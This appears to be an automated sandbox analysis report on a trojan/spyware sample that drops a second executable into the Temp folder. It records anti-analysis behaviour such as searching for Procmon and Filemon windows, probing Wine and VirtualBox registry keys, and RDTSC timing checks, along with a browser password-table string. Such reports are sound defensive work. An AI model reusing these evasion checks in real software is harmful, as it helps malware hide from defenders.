Source: file.exe, 00000000.00000003.2281940477.0000000005C63000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2283041984.0000000005D52000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2285730556.0000000005D89000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2286646405.0000000005C6E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2285360013.0000000005D77000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2282514717.0000000005D5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2285852143.0000000005C64000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2272912487.0000000005AB2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2300393475.00000000057BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2300488298.0000000005716000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2266879369.0000000005808000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2271385194.0000000005C70000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2271004061.0000000005AB7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2279596825.0000000005E13000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2273676738.0000000005AB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: ZLIB complexity 0.9976856387147336

Source: file.exe

Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/2@2/2

Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe

Code function: 3_2_055515D0 ChangeServiceConfigA,

3_2_055515D0

Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\4LSU4O6YQKPDF8R94WQ6K0Z23.exe.log

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe, 00000000.00000003.2120953022.0000000005679000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134383868.0000000005677000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120777962.0000000005696000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: file.exe

ReversingLabs: Detection: 36%

Source: 4LSU4O6YQKPDF8R94WQ6K0Z23.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: file.exe	String found in binary or memory: `e]RtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNePU

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe "C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe "C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Section loaded: sspicli.dll	Jump to behavior

Source: file.exe

Static file information: File size 3037696 > 1048576

Source: file.exe

Static PE information: Raw size of gafnxzej is bigger than: 0x100000 < 0x2ba400

Source:

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.d30000.0.unpack :EW;.rsrc :W;.idata :W;gafnxzej:EW;bpwpzarm:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;gafnxzej:EW;bpwpzarm:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Unpacked PE file: 3.2.4LSU4O6YQKPDF8R94WQ6K0Z23.exe.a60000.0.unpack :EW;.rsrc:W;.idata :W;vapebhpc:EW;vabnfpbo:EW;.taggant:EW; vs :ER;.rsrc:W;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: 4LSU4O6YQKPDF8R94WQ6K0Z23.exe.0.dr	Static PE information: real checksum: 0x2ac743 should be: 0x2b1054
Source: file.exe	Static PE information: real checksum: 0x2ecd34 should be: 0x2e907e

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name: gafnxzej
Source: file.exe	Static PE information: section name: bpwpzarm
Source: file.exe	Static PE information: section name: .taggant
Source: 4LSU4O6YQKPDF8R94WQ6K0Z23.exe.0.dr	Static PE information: section name:
Source: 4LSU4O6YQKPDF8R94WQ6K0Z23.exe.0.dr	Static PE information: section name: .idata
Source: 4LSU4O6YQKPDF8R94WQ6K0Z23.exe.0.dr	Static PE information: section name: vapebhpc
Source: 4LSU4O6YQKPDF8R94WQ6K0Z23.exe.0.dr	Static PE information: section name: vabnfpbo
Source: 4LSU4O6YQKPDF8R94WQ6K0Z23.exe.0.dr	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_05672C71 pushfd ; retf	0_3_05672C72
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_05672C71 pushfd ; retf	0_3_05672C72
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_056728D3 push ecx; retf	0_3_056728D4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_056728D3 push ecx; retf	0_3_056728D4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_056733A1 push cs; iretd	0_3_056733A2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_056733A1 push cs; iretd	0_3_056733A2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_05675C99 push cs; ret	0_3_05675D0C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_05675C99 push cs; ret	0_3_05675D0C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_05672C71 pushfd ; retf	0_3_05672C72
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_05672C71 pushfd ; retf	0_3_05672C72
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_056728D3 push ecx; retf	0_3_056728D4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_056728D3 push ecx; retf	0_3_056728D4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_056733A1 push cs; iretd	0_3_056733A2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_056733A1 push cs; iretd	0_3_056733A2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_05675C99 push cs; ret	0_3_05675D0C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_05675C99 push cs; ret	0_3_05675D0C
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Code function: 3_2_00BEC1B1 push 2FB14588h; mov dword ptr [esp], eax	3_2_00BEC214
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Code function: 3_2_00BEC1B1 push esi; mov dword ptr [esp], ebp	3_2_00BEC258
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Code function: 3_2_00BEC1B1 push 24BECD0Eh; mov dword ptr [esp], edi	3_2_00BEC27B
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Code function: 3_2_00A710A3 push eax; mov dword ptr [esp], ecx	3_2_00A710A4
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Code function: 3_2_00A748AA push 31E04FFAh; mov dword ptr [esp], ecx	3_2_00A748B3
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Code function: 3_2_00A718B4 push 5A10A923h; mov dword ptr [esp], eax	3_2_00A7401F
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Code function: 3_2_00A718B4 push ebx; mov dword ptr [esp], eax	3_2_00A74249
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Code function: 3_2_00A6C08A push ebp; mov dword ptr [esp], edi	3_2_00A6C368
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Code function: 3_2_00A6C08A push esi; iretd	3_2_00A6C712
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Code function: 3_2_00BEA089 push ebx; mov dword ptr [esp], ecx	3_2_00BEA096
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Code function: 3_2_00BF50FD push edx; mov dword ptr [esp], 5B09EC77h	3_2_00BF56D0
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Code function: 3_2_00BF50FD push 33FFD891h; mov dword ptr [esp], eax	3_2_00BF577F
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Code function: 3_2_00A710C5 push 54FE1C73h; mov dword ptr [esp], edx	3_2_00A710CD
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Code function: 3_2_00BEF8DA push edx; mov dword ptr [esp], eax	3_2_00BF038B
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Code function: 3_2_00A6C0C8 push 23B97E4Eh; mov dword ptr [esp], ebx	3_2_00A6C63C

Source: file.exe	Static PE information: section name: entropy: 7.965076587141377
Source: 4LSU4O6YQKPDF8R94WQ6K0Z23.exe.0.dr	Static PE information: section name: entropy: 7.7955242962683995

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe

Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\file.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFCDC9 second address: EFCDCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1885E second address: F18866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F18866 second address: F18879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007F9D4900D0C6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F18879 second address: F18888 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jng 00007F9D493C17C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F18B47 second address: F18B4C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1B5DC second address: F1B62B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 je 00007F9D493C17D9h 0x0000000d jmp 00007F9D493C17D3h 0x00000012 popad 0x00000013 mov dword ptr [esp], eax 0x00000016 movsx edi, dx 0x00000019 jg 00007F9D493C17C8h 0x0000001f mov ch, 95h 0x00000021 push 00000000h 0x00000023 adc edi, 7E86E512h 0x00000029 push 598F3ACCh 0x0000002e pushad 0x0000002f jmp 00007F9D493C17CFh 0x00000034 push ebx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1B704 second address: F1B75D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 nop 0x00000007 stc 0x00000008 push 00000000h 0x0000000a mov edi, dword ptr [ebp+122D2D85h] 0x00000010 call 00007F9D4900D0C9h 0x00000015 push edx 0x00000016 jmp 00007F9D4900D0D3h 0x0000001b pop edx 0x0000001c push eax 0x0000001d js 00007F9D4900D0DDh 0x00000023 jno 00007F9D4900D0D7h 0x00000029 mov eax, dword ptr [esp+04h] 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jno 00007F9D4900D0C6h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1B86E second address: F1B872 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1B872 second address: F1B8CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 sub dword ptr [ebp+122D1C9Eh], edx 0x0000000f push 00000000h 0x00000011 mov edi, dword ptr [ebp+122D2F7Ah] 0x00000017 call 00007F9D4900D0C9h 0x0000001c pushad 0x0000001d jmp 00007F9D4900D0CBh 0x00000022 push esi 0x00000023 jmp 00007F9D4900D0CBh 0x00000028 pop esi 0x00000029 popad 0x0000002a push eax 0x0000002b pushad 0x0000002c pushad 0x0000002d pushad 0x0000002e popad 0x0000002f jmp 00007F9D4900D0D8h 0x00000034 popad 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3D89F second address: F3D8A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3B765 second address: F3B781 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F9D4900D0D3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3B781 second address: F3B79E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D493C17D1h 0x00000009 jno 00007F9D493C17C6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3B79E second address: F3B7D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F9D4900D0DAh 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F9D4900D0D2h 0x00000012 push edi 0x00000013 jmp 00007F9D4900D0D8h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3BBF1 second address: F3BBF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3BBF5 second address: F3BC0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F9D4900D0C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d jo 00007F9D4900D0D9h 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3BEF3 second address: F3BEF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
